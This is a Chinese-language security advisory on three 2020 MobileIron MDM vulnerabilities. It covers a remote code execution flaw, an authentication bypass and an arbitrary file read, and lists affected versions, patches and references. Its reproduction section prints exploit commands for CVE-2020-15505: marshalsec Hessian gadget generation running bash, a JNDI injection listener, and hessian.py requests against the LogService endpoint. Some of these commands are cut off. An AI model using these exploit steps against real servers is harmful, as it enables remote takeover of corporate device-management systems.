MobileIron | 11月MDM多个安全漏洞通告
发布时间 2020-11-260x00 漏洞概述
产品名称 | CVE ID | 类 型 | 漏洞等级 | 远程利用 |
MobileIron Core & Connector、Sentry、Monitor and Reporting Database (RDB) | CVE-2020-15505 | RCE | 严重 | 是 |
MobileIron Core&Connector | CVE-2020-15506 | 身份验证绕过 | 严重 | 是 |
MobileIron Core | CVE-2020-15507 | 任意文件读取 | 高危 | 是 |
0x01 漏洞详情
MobileIron是全球领先且发展最迅速的移动IT解决方案厂商之一,在全球有近20000家公司使用MobileIron的移动设备管理解决方案(MDM)。
2020年10月22日,MobileIron发布更新公告,MDM中存在的多个安全漏洞(CVE-2020-15505、CVE-2020-15506和CVE-2020-15507)已在6月15日发布的补丁中被修复。漏洞详情如下:
MobileIron远程代码执行漏洞(CVE-2020-15505)
该漏洞是MobileIron移动设备管理(MDM)中的一个远程代码执行漏洞,其CVSS评分9.8。攻击者可以利用此漏洞执行任意代码并控制公司的服务器。
该漏洞的PoC已于9月在Github上被公布。近日,该漏洞正在被APT组织和网络犯罪组织积极尝试利用。
漏洞复现:
Groovy反序列化小工具
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Hessian Groovy "/bin/bash" "-c" "
python hessian.py -u 'https://mobileiron-mdm-instance/mifs/.;/services/LogService' -p exp.ser
本地JNDI注入
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -A 0.0.0.0 -C "
java -cp ./marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Hessian SpringAbstractBeanFactoryPointcutAdvisor rmi://
python hessian.py -p exp -u 'https://mobileiron-mdm-instance/mifs/.;/services/LogService'
影响范围:
MobileIron Core&Connector:10.3.0.3及之前版本、10.4.0.0、10.4.0.1、10.4.0.2、10.4.0.3、10.5.1.0、10.5.2.0、10.6.0.0
Sentry:9.7.2及之前版本、9.8.0
Monitor and Reporting Database (RDB):2.0.0.1及之前版本
MobileIron身份验证绕过漏洞(CVE-2020-15506)
该漏洞是MobileIron移动设备管理(MDM)中的一个身份验证绕过漏洞,其CVSS评分9.8。攻击者可利用此漏洞绕过身份验证机制。
影响范围:
MobileIron Core&Connector:
10.3.0.3及之前版本
10.4.0.0、10.4.0.1、10.4.0.2、10.4.0.3
10.5.1.0、10.5.2.0
10.6.0.0
MobileIron任意文件读取漏洞(CVE-2020-15507)
该漏洞是MobileIron移动设备管理(MDM)中的一个任意文件读取漏洞,其CVSS评分7.5。攻击者可利用此漏洞读取文件系统中的敏感信息。
影响范围:
MobileIron Core:
10.3.0.3及之前版本
10.4.0.0、10.4.0.1、10.4.0.2、10.4.0.3
10.5.1.0、10.5.2.0
10.6.0.0
0x02 处置建议
目前MobileIron已经发布了相关更新,建议参升级至如下版本。
MobileIron Core & Enterprise Connector:
v10.3.0.4、v10.4.0.4、v10.5.1.1、v10.5.2.1、v10.6.0.或更高版本。
MobileIron Sentry:
v9.7.3、v9.8.1或更高版本。
MobileIron Monitor and Reporting Database (RDB):
v2.0.0.2或更高版本。
补丁链接:
https://help.mobileiron.com/s/article-detail-page?Id=kA12T000000g065SAA
0x03 参考链接
https://www.mobileiron.com/en/blog/mobileiron-security-updates-available
https://threatpost.com/critical-mobileiron-rce-flaw-attack/161600/
https://github.com/httpvoid/CVE-Reverse/tree/master/CVE-2020-15505
0x04 时间线
2020-07-01 MobileIron发布安全公告
2020-10-22 MobileIron更新安全公告
2020-11-26 VSRC发布安全通告
0x05 附录
CVSS评分标准官网:http://www.first.org/cvss/